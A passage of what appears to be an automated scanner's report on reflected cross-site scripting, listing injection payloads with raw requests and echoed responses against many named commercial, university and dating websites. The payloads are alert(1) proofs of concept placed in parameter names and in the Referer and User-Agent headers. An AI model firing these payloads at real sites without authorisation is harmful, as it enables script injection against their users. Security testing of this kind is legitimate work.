Confidence:   Certain
Host:   http://www.teleprofitsnow.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1be64"style%3d"x%3aexpression(alert(1))"cdfb73ef9b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1be64"style="x:expression(alert(1))"cdfb73ef9b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?1be64"style%3d"x%3aexpression(alert(1))"cdfb73ef9b5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teleprofitsnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11977
Content-Type: application/xhtml+xml; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="DSP NON CUR OUR STP NAV COM STA UNI"
Date: Sat, 02 Apr 2011 15:20:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   This Call Can
...[SNIP]...
<input name="Contact0_referrerURL" type="hidden" value="http://www.teleprofitsnow.com/default.aspx?1be64"style="x:expression(alert(1))"cdfb73ef9b5=1" />
...[SNIP]...

2.59. http://www.trekbikes.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trekbikes.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50712"-alert(1)-"3b2cb68c3da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?50712"-alert(1)-"3b2cb68c3da=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trekbikes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 15:30:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 15:30:03 GMT
server-id: atlcfiweb02
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
       var pageTracker = _gat._getTracker("UA-1494547-14");
       pageTracker._initData();
               pageTracker._trackPageview("/404_error/?50712"-alert(1)-"3b2cb68c3da=1");
           </script>
...[SNIP]...

2.60. http://www.ub.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ub.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b9b9"><a>2571ca6bec6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?4b9b9"><a>2571ca6bec6=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 16:13:35 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9
X-Powered-By: PHP/5.2.9 ZendServer/4.0
Set-Cookie: SESS8f85ad2954e33e42d51c1688d78b429a=u8iovh8e9lnn1kpig8pr2lvf77; expires=Mon, 25-Apr-2011 19:46:55 GMT; path=/; domain=.ub.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 16:13:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 30254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<link type="text/css" rel="stylesheet" media="all" href="/sites/default/themes/ub/css/?4b9b9"><a>2571ca6bec6=1.css?lang=en" />
...[SNIP]...

2.61. http://www.uci.edu/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uci.edu
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faaf9"><script>alert(1)</script>5555b47234a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?faaf9"><script>alert(1)</script>5555b47234a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uci.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:06:15 GMT
Server: Apache/2.2.3 (Red Hat) mod_auth_kerb/5.1 mod_nss/2.2.3 NSS/3.12.8.0 Basic ECC PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20263

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>University of California, Irvine</title
...[SNIP]...
<a href="?faaf9"><script>alert(1)</script>5555b47234a=1&theme=0">
...[SNIP]...

2.62. http://www.usedcars.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usedcars.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae949"style%3d"x%3aexpression(alert(1))"e0ddab0b7d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae949"style="x:expression(alert(1))"e0ddab0b7d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?ae949"style%3d"x%3aexpression(alert(1))"e0ddab0b7d5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.usedcars.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:33:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Used Cars
...[SNIP]...
<div onclick="location.href='new-car.aspx?ae949"style="x:expression(alert(1))"e0ddab0b7d5=1'" class="spr_widget_newcarbtn">
...[SNIP]...

2.63. http://www.viagra.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viagra.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8206d'-alert(1)-'06086a87a73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8206d'-alert(1)-'06086a87a73=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viagra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56090
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 02 Apr 2011 16:10:25 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>
       VI
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName='http://www.viagra.com/index.aspx?8206d'-alert(1)-'06086a87a73=1';
s.pageType='';
s.prop1='home';
s.prop3='home:viagra';
s.prop5='';
/* Conversion Variables */
s.campaign='';
s.events='7:pageview';
s.eVar3='home:viagra';
s.eVar5='';
s.eVar6='';
s.eVar18='';
s.eVa
...[SNIP]...

2.64. http://www.visitlasvegas.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitlasvegas.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e85f7--><script>alert(1)</script>27040fdae7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?e85f7--><script>alert(1)</script>27040fdae7e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.visitlasvegas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:09:03 GMT
Server: Apache/2.2.4 (Unix) mod_jk/1.2.25
Set-Cookie: JSESSIONID=D95B8888E77B07D19F6C166A9AB21287.p2; Path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 53476


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--

   e85f7--><script>alert(1)</script>27040fdae7e:

       0: 1

-->
...[SNIP]...

2.65. http://www.worldstart.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.worldstart.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6f98"><script>alert(1)</script>f7d2674b206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f6f98\"><script>alert(1)</script>f7d2674b206 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f6f98"><script>alert(1)</script>f7d2674b206=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worldstart.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:15:26 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=klvuenbh3nqvnsr44i190bp3a1; path=/; domain=.worldstart.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: wplogintrack=yes; expires=Sat, 19-Mar-2011 15:15:26 GMT; path=/; domain=worldstart.com
X-Pingback: http://www.worldstart.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 43112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile
...[SNIP]...
<input type="hidden" name="location" value="http://www.worldstart.com/?f6f98\"><script>alert(1)</script>f7d2674b206=1" />
...[SNIP]...

2.66. http://www.yankodesign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yankodesign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 445df"><script>alert(1)</script>131a4f6060e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 445df\"><script>alert(1)</script>131a4f6060e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?445df"><script>alert(1)</script>131a4f6060e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yankodesign.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 02 Apr 2011 15:30:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Vary: Cookie
X-Pingback: http://www.yankodesign.com/xmlrpc.php
Set-Cookie: _icl_current_language=en; expires=Sun, 03-Apr-2011 15:30:03 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"
xmlns:og="htt
...[SNIP]...
<a
href="http://www.yankodesign.com/page/2/?445df\"><script>alert(1)</script>131a4f6060e=1" title="Page 2">
...[SNIP]...

2.67. http://www.amatura.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.amatura.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55293'-alert(1)-'1523160a494 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amatura.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 55293'-alert(1)-'1523160a494

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:48:39 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.8
X-Powered-By: PHP/5.2.8
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 15:48:39GMT
Set-Cookie: last_from=good; expires=Sun, 03-Apr-2011 15:48:39 GMT; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 249633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
<head>
<script type="text/javasc
...[SNIP]...
<!--
document.cookie='atref=55293'-alert(1)-'1523160a494$#; path=/;'
// -->
...[SNIP]...

2.68. http://www.avantlink.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.avantlink.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload e6ebf--><script>alert(1)</script>4d07ef56e0f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3e6ebf--><script>alert(1)</script>4d07ef56e0f
Host: www.avantlink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:48:49 GMT
Server: Apache
X-Pingback: http://www.avantlink.com/wordpress/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 29331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<!-- DEBUG: HTTP_USER_AGENT='curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 openssl/0.9.8o zlib/1.2.3e6ebf--><script>alert(1)</script>4d07ef56e0f' -->
...[SNIP]...

2.69. http://www.beatmybox.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.beatmybox.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a606'-alert(1)-'7b0131398cc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beatmybox.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 5a606'-alert(1)-'7b0131398cc

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:56:21 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 140196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <title>Sex Tube Video
...[SNIP]...
<!--
document.cookie='atref=5a606'-alert(1)-'7b0131398cc$$; path=/;'
// -->
...[SNIP]...

2.70. http://www.bookofmatches.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bookofmatches.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 91740<script>alert(1)</script>1a735c0a5ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bookofmatches.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=91740<script>alert(1)</script>1a735c0a5ee

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Set-Cookie: reftext=http://www.google.com/search?hl=en&q=91740<script>alert(1)</script>1a735c0a5ee; Expires=Thu, 14-Apr-2011 05:04:23 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 02 Apr 2011 15:17:44 GMT
Content-Length: 18019


<html>
<head>

<title>Singles Dating :: Personals Site :: Women Seeking Men</title>
<script language="javascript" type="text/javascript">
if (self != top) {
if (document.im
...[SNIP]...
<b>91740<SCRIPT>ALERT(1)</SCRIPT>1A735C0A5EE</b>
...[SNIP]...

2.71. http://www.bradfordexchangechecks.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bradfordexchangechecks.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85f9e"%3balert(1)//ad70704b4a9 was submitted in the Referer HTTP header. This input was echoed as 85f9e";alert(1)//ad70704b4a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bradfordexchangechecks.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 85f9e"%3balert(1)//ad70704b4a9

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:38:46 GMT
Server: IBM_HTTP_Server
P3P: CP="IDC DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONa OUR DELa SAMa OTRa IND UNI PUR COM NAV"
Set-Cookie: USERID=X04f4rCqwhiiyjjlMkqHJ0AZa3+ZjHYn; Expires=Fri, 01 Jul 2011 15:38:46 GMT; Path=/bec; Domain=.bradfordexchangechecks.com
Set-Cookie: popupAppeared=true; Expires=Fri, 01 Jul 2011 15:38:46 GMT; Path=/bec; Domain=.bradfordexchangechecks.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64836


<!-- Server Name = od0bg-urh103.istructure.bradgroup -->


<html>
<head>
   <title>Order Discount Personal Checks Onli
...[SNIP]...
<script language="javascript1.1">

       cmCreateTechPropsTag( "Front Door","85f9e";alert(1)//ad70704b4a9"
, "web1", true, false, false, false, "Front Door", null, null, null, null, null, null, null, "null", "null", "null", "null" );


</script>
...[SNIP]...

2.72. http://www.christopherandbanks.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.christopherandbanks.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 243eb"><script>alert(1)</script>bc93ac1cd73 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.christopherandbanks.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 243eb"><script>alert(1)</script>bc93ac1cd73

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:35:55 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=r3QsNXCb4kc3Rlh3Cp7v0GgdLCRGK1N7ZcpDfxM1C3chTGgk25d3!1302562398; path=/
Set-Cookie: browser_id=123866002344; expires=Tuesday, 30-Mar-2021 15:35:55 GMT; path=/
Set-Cookie: browser_id=123866002344; expires=Tuesday, 30-Mar-2021 15:35:55 GMT; path=/
Set-Cookie: browser_id=123866002344; expires=Tuesday, 30-Mar-2021 15:35:55 GMT; path=/
Set-Cookie: browser_id=123866002344; expires=Tuesday, 30-Mar-2021 15:35:55 GMT; path=/
Set-Cookie: browser_id=123866002344; expires=Tuesday, 30-Mar-2021 15:35:55 GMT; path=/
Set-Cookie: browser_id=123866002344; expires=Tuesday, 30-Mar-2021 15:35:55 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28355


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Checking productPreviewAllowed -->



...[SNIP]...
<IFRAME src="http://fls.doubleclick.net/activityi;src=1990535;type=homep578;cat=chris252;u1=;u2=1;u3=;u4=;u5=243eb"><script>alert(1)</script>bc93ac1cd73;u6=;u7=;ord=1;num=19976660?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

2.73. http://www.curezone.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.curezone.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb66f"><script>alert(1)</script>4037935a9a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curezone.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=bb66f"><script>alert(1)</script>4037935a9a

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 15:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Fri, 01 Apr 2011 22:38:57 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>

<meta name="google-site-verification" content="evYYGlmZv0RpFVdpbIvaUyQhlbgRCR0AAJcFrhpT69o" />


<meta http-equiv="expi
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=bb66f"><script>alert(1)</script>4037935a9a">
...[SNIP]...

2.74. http://www.curezone.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.curezone.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f1901<script>alert(1)</script>a5ecaf5203a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

